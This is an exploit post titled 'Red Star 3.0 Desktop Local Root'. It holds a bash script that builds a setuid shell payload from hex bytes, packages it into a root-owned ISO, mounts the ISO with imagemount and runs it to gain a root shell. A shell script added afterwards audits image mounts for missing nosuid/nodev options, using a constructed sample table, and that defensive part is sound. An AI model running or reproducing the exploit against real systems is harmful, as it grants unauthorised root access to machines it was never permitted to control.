
Red Star 3.0 Desktop Local Root

Posted on 14 January 2015

#!/bin/bash
# Another local 0day in Red Star 3.0 Desktop by TheGreatLeader
# Run exploit in a X11 terminal and enjoy a root shell...

# Create temp dir for our payload
mkdir /tmp/DPRK

# msfpayload linux/x86/exec PrependSetuid=true CMD=/bin/bash X
echo -e -n "x7fx45x4cx46x01x01x01x00x00x00x00x00x00x00x00x00x02x00x03x00x01x00x00x00x54x80x04x08x34x00x00x00x00x00x00x00x00x00x00x00x34x00x20x00x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x80x04x08x00x80x04x08x88x00x00x00xbcx00x00x00x07x00x00x00x00x10x00x00x31xdbx6ax17x58xcdx80x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x0ax00x00x00x2fx62x69x6ex2fx62x61x73x68x00x57x53x89xe1xcdx80" > /tmp/DPRK/TheGreatLeader

# Set the setuid bit
chmod 4755 /tmp/DPRK/TheGreatLeader

# Create ISO and keep permissions, change file owner to root in the iso
/usr/bin/mkisofs --quiet -R --uid 0 -o /tmp/TheGreatLeader.iso /tmp/DPRK

# Delete temp payload
rm -f /tmp/DPRK/TheGreatLeader

# Mount the ISO
imagemount -m /tmp/TheGreatLeader.iso -d /tmp/DPRK
cd /tmp/DPRK

# Enjoy your root shell :)
./TheGreatLeader
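The script above depends on the mounted ISO honouring the setuid bit and root ownership recorded in the image, so a defender's check is whether image and removable-media mounts carry `nosuid` and `nodev`. The following audit is an added example, not part of the original post; the filesystem list and the sample mount table are assumptions constructed for illustration, and the input format is that of `/proc/mounts`.

```shell
#!/bin/sh
# Added example: flag image/removable-media mounts that still honour
# setuid bits or device nodes. Reads /proc/mounts-style lines on stdin:
#   device mountpoint fstype options dump pass

# Filesystem types that typically come from user-supplied images or media.
# Assumed list for this example; extend it for your environment.
RISKY_FS="iso9660 udf squashfs"

# has_opt OPTIONS NAME: succeeds if NAME is one of the comma-separated OPTIONS.
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *) return 1 ;;
    esac
}

# audit_mounts: prints "mountpoint fstype missing:<options>" for every
# risky mount that lacks nosuid and/or nodev.
audit_mounts() {
    while read -r _dev mnt fs opts _rest; do
        risky=0
        for t in $RISKY_FS; do
            if [ "$fs" = "$t" ]; then risky=1; fi
        done
        if [ "$risky" -ne 1 ]; then continue; fi
        missing=""
        if ! has_opt "$opts" nosuid; then missing="nosuid"; fi
        if ! has_opt "$opts" nodev; then missing="${missing:+$missing,}nodev"; fi
        if [ -n "$missing" ]; then echo "$mnt $fs missing:$missing"; fi
    done
    return 0
}

# Constructed sample mount table (not captured from a real system).
sample_mounts() {
    cat <<'EOF'
/dev/sda1 / ext4 rw,relatime 0 0
/dev/loop0 /tmp/DPRK iso9660 ro,relatime 0 0
/dev/sr0 /media/cdrom iso9660 ro,nosuid,nodev,relatime 0 0
/dev/loop1 /mnt/img udf ro,nosuid,relatime 0 0
EOF
}

# Demo on the constructed sample; on a live host use: audit_mounts < /proc/mounts
sample_mounts | audit_mounts
```

Any line it prints is a mount where a root-owned setuid file inside the image would run with elevated privileges; remounting with `nosuid,nodev` closes that path.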

 
